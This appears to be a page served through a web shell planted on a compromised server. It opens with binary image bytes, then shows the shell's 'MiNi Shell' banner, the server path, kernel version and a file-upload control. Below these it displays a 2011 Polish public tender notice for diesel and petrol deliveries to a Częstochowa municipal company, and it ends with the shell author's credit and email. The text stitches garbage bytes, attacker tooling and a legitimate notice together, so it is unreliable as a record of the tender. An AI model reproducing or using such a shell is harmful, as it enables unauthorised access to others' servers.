JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111128/310207-N-2011.html

<p class="kh_header"><b>Wrzosowa: Sukcesywne dostawy paliw do Częstochowskiego Przedsiębiorstwa Komunalnego Sp. z o.o. w Sobuczynie w 2012r</b><br>
<b>Numer ogłoszenia: 310207 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Częstochowskie Przedsiębiorstwo Komunalne Sp. z o.o. , Sobuczyna, ul. Konwaliowa 1, 42-263 Wrzosowa, woj. śląskie, tel. (034) 327-53-20, faks (034) 327-52-66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czpk.czestochowa.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy paliw do Częstochowskiego Przedsiębiorstwa Komunalnego Sp. z o.o. w Sobuczynie w 2012r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  i zakres zamówienia. 
Przedmiotem zamówienia są sukcesywne dostawy paliw do Częstochowskiego Przedsiębiorstwa Komunalnego Sp. z o.o. w Sobuczynie w następujących ilościach: 
- OLEJ NAPĘDOWY w ilości 145 m3
- BENZYNA BEZOŁOWIOWA 95 w ilości 1,30 m3

TABELA NR 1.  Sukcesywna dostawa oleju napędowego w ilości max. 145 m3
Lp. WYMOGI:
 WARUNKI DOSTAWY
1. W zależności od swoich bieżących potrzeb Zamawiający w trakcie trwania umowy (przez okres 36 miesięcy) będzie składał Wykonawcy jednostkowe zamówienia        na dostawę oleju napędowego aż do zrealizowania całkowitej ilości zamówienia. 
2. Miejscem dostawy oleju napędowego jest Częstochowskie Przedsiębiorstwo Komunalne Sp. z o.o. w Sobuczynie. ul. Konwaliowa 1, 42-263 Wrzosowa.
Realizacja dostawy będzie się odbywać do 48 godzin od momentu złożenia zamówienia (z wyjątkiem sobót oraz dni wolnych w rozumieniu ustawy z dnia 18 stycznia 1951 o dniach wolnych od pracy Dz.U. 1951.4.28 z późn. zm.). Dostawy będą przyjmowane przez Zamawiającego w godz. 7.00. - 13.00. w dni robocze.
3. Dostarczany olej napędowy (letni, przejściowy lub zimowy w zależności od pory roku) powinien spełniać wszystkie wymagane normy jakościowe i posiadać wymagane świadectwo jakości (orzeczenie laboratoryjne); 
4. Każda dostawa oleju napędowego będzie wynosiła min. 4 000 litrów lub więcej w zależności od bieżącego zapotrzebowania. Ilość jednorazowa może ulec zmianie na wniosek Zamawiającego bez wpływu na stosowane ceny w rozliczeniach oraz bez konieczności aneksowania umowy.
5. Dostawy oleju napędowego będą odbywać się autocysterną wyposażoną w zalegalizowany licznik paliwa, oraz miernik temperatury paliwa. Rozładunek paliwa odbywać się będzie przy zastosowaniu pompy przy autocysternie do pojemników Zamawiającego (informujemy, że posiadamy dwa zbiornik o pojemności 5000 litrów oraz beczki 200 litrowe).
Z każdej dostawy w obecności kierowcy dostawcy pobierana będzie próbka oleju i przechowywana w zaplombowanym pojemniku w siedzibie Zamawiającego (pojemnik przygotowany przez Zamawiającego zostanie zaplombowany dwiema plombami z których jedna będzie założona przez kierowcę dostawcy, a druga przez pracownika Zamawiającego - kierowca dostawcy jest zobowiązany posiadać własne plomby oraz urządzenie do montażu w/w przedmiotu). W przypadku stwierdzenia nieprawidłowości w pracy urządzeń próbka kierowana będzie do zbadania przez niezależne laboratorium. W przypadku stwierdzenia, że pobrana z autocysterny próbka oleju nie spełnia wymaganych norm jakościowych, Wykonawca wymieni dostarczony olej napędowy na wolny od wad w terminie 3 dni od otrzymania pisemnego zawiadomienia oraz uzupełni braki ilościowe, jak również zobowiązany będzie do pokrycia wszelkich strat i kosztów jakie poniesie Zamawiający w związku z zaistniałą sytuacją.
6. Zamawiający zastrzega sobie prawo do kontroli paliwa pod względem jakości i ilości. Autocysterna, o której mowa w pkt. 5 będzie ważona na wadze Zamawiającego przy wjeździe i wyjeździe.
7. Świadectwa jakości (orzeczenie laboratoryjne), dokument wydania paliwa (WZ) będą dołączone do każdej dostawy oleju napędowego.
Świadectwo legalizacji licznika cysterny ma być dostarczane przy każdej pierwszej dostawie nowym samochodem (cysterna).
8. Zamawiający oświadcza, że zgodnie z ustawą z dnia 10 kwietnia 1997 r. Prawo energetyczne (Dz. U. z 2003 r. nr 153, poz. 1504 z późn. zm.), wyłączony jest z wymogu posiadania koncesji  w zakresie obrotu paliwami ciekłym, gdyż kupuje paliwo na własny użytek.
9. ROZLICZENIE
Rozliczenie odbywać się będzie na podstawie dokumentu wydania paliwa (WZ), załączonego przez dostawcę do każdej jednostkowej dostawy. Dokument, o którym mowa w zdaniu poprzedzającym, zawierać będzie w szczególności następujące informacje:
1) datę wydania dokumentu,
2) miejsce nalewania paliwa,
3) temperaturę nalewania, 
4) ilość wlanego paliwa wyrażona w litrach,
5) numer rejestracyjny pojazdu.
do powyższego dokumentu przy każdej dostawie paliwa Wykonawca będzie dołączał aktualny wydruk ze strony internetowej www.orlen.pl informujący o cenie paliwa, a w przypadku zaopatrywania się Wykonawcy u innego dystrybutora, także wydruk z informacją o cenie paliwa u tego dystrybutora.
Zamawiający informuje, że dostarczona ilość oleju napędowego fakturowana będzie w temperaturze referencyjnej 150C.
10. CENA 
10.1. Wartość każdej z dostaw zrealizowanych na podstawie jednostkowego zamówienia ustalana będzie na zasadach wskazanych we wzorze umowy. Do ceny jednostkowej netto dodawany będzie podatek VAT, zgodnie                                  z obowiązującymi przepisami.
10.2. Cena każdej z dostaw może ulec zmianie (podwyższenie lub obniżenie), przy czym podstawą wyliczenia ceny konkretnej dostawy jest cena paliwa obowiązująca w dniu sprzedaży w Rafinerii ORLEN S.A., powiększona lub pomniejszona o stałą kwotę marży jednostkowej.
10.3. W przypadku zaopatrywania się przez Wykonawcę w paliwa u innego dystrybutora niż ORLEN S.A. cena każdej z dostaw ustalana jest na podstawie ceny paliwa obowiązującej w dniu sprzedaży u dystrybutora u którego zaopatruje się Wykonawca, powiększona lub pomniejszona o stałą kwotę marży jednostkowej. Tak ustalona cena dostawy nie może być wyższa od ceny dostawy ustalonej na podstawie kryteriów wskazanych w pkt 2 powyżej.  
11. UWAGA: 
Koszty transportu paliwa do siedziby Zamawiającego oraz podatek akcyzowy są składnikiem ceny.


TABELA NR 2.  Sukcesywna dostawa benzyny bezołowiowej 95  w ilości max. 1,30 m3
Lp. WYMOGI:
1. W zależności od swoich bieżących potrzeb Zamawiający w trakcie trwania umowy (przez okres 36 miesięcy) będzie składał Wykonawcy jednostkowe zamówienia na dostawę etyliny aż do zrealizowania całkowitej ilości zamówienia.
2. Miejscem dostawy jest Częstochowskie Przedsiębiorstwo Komunalne Sp. z o.o. w Sobuczynie. ul. Konwaliowa 1, 42-263 Wrzosowa.
Realizacja dostawy etyliny będzie się odbywać do 48 godzin od momentu złożenia zamówienia (z wyjątkiem sobót oraz dni wolnych w rozumieniu ustawy z dnia         18 stycznia 1951 o dniach wolnych od pracy Dz.U. 1951.4.28 z późn. zm.).             Dostawy będą przyjmowane przez Zamawiającego w godz. 7.00. - 13.00. w dni robocze.
3. Dostarczana etylina powinna spełniać wszystkie wymagane normy jakościowe.
4. Każda dostawa etyliny będzie wynosiła 200 litrów,  w zależności od bieżącego zapotrzebowania. Ilość jednorazowa może ulec zmianie na wniosek Zamawiającego bez wpływu na stosowane ceny w rozliczeniach oraz bez konieczności aneksowania umowy z zastrzeżeniem, że będzie to zawsze krotność 200 litrów. Dostawa odbywać się będzie w beczkach 200 litrowych.
5. CENA 
5.1.Wartość każdej z dostaw zrealizowanych na podstawie jednostkowego zamówienia ustalana będzie na zasadach wskazanych we wzorze umowy. Do ceny jednostkowej netto dodawany będzie podatek VAT, zgodnie z obowiązującymi przepisami.
5.2. Cena każdej z dostaw może ulec zmianie (podwyższenie lub obniżenie), przy czym podstawą wyliczenia ceny konkretnej dostawy jest cena paliwa obowiązująca w dniu sprzedaży w Rafinerii ORLEN S.A., powiększona lub pomniejszona o stałą kwotę marży jednostkowej.
5.3. W przypadku zaopatrywania się przez Wykonawcę w paliwa u innego dystrybutora niż ORLEN S.A. cena każdej z dostaw ustalana jest na podstawie ceny paliwa obowiązującej w dniu sprzedaży u dystrybutora u którego zaopatruje się Wykonawca, powiększona lub pomniejszona o stałą kwotę marży jednostkowej. Tak ustalona cena dostawy nie może być wyższa od ceny dostawy ustalonej na podstawie kryteriów wskazanych w pkt 2 powyżej. 
6. UWAGA: 
Koszty transportu paliwa do siedziby Zamawiającego oraz podatek akcyzowy są składnikiem ceny.
7. Zamawiający zastrzega sobie prawo do kontroli paliwa pod względem jakości  i ilości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.10.00.00-0, 09.13.41.00-8, 09.13.21.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wysokość wadium
Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na przedmiot zamówienia na kwotę 5 000,00 zł (słownie: pięć tysięcy złotych).

2. Termin wniesienia
Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w pkt. 11.1 SIWZ.
W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu  w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.

3. Forma 
Wadium można wnieść:
1) w pieniądzu 
2) w poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2007r. Nr 42 poz. 275 z późn. zm.). 
   
Wadium wnoszone w pieniądzu należy wpłacić na rachunek: 
Oddział Operacyjny BGŻ S.A. w Częstochowie
nr rachunku: 80 2030 0045 1110 0000 0204 1000
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w sekretariacie Częstochowskiego Przedsiębiorstwa Komunalnego Sp. z o.o., Sobuczyna ul. Konwaliowa 1, a  kserokopię potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy dołączyć do oferty.

4. Zwrot
Zamawiający będzie dokonywał zwrotu wadium na zasadach określonych w art. 46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży kserokopię aktualnej koncesji na obrót paliwami ciekłymi.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie wykonania, tj. zakończenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, co najmniej 2 zamówień polegających na dostawie paliw silnikowych w ilości min. 10 000 litrów miesięcznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedstawienie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Ofertowy (wg. Zał. Nr 1 SIWZ)
2. Zaparafowany na każdej ze stron wzór umowy (Zał. Nr 4 SIWZ)
3. Potwierdzenie wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość zmiany postanowień w zawartej umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie wynagrodzenia w przypadku zmiany obowiązującej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czpk.czestochowa.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można odebrać nieodpłatnie w siedzibie Częstochowskiego Przedsiębiorstwa Komunalnego Sp. z o. o.  w Sobuczyna, ul. Konwaliowa 1 w godzinach od 8:00 do 14:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2011 godzina 11:00, miejsce: Sekretariat Częstochowskiego Przedsiębiorstwa Komunalnego Sp. z o. o.  w Sobuczyna, ul. Konwaliowa 1, 42 - 263 Wrzosowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com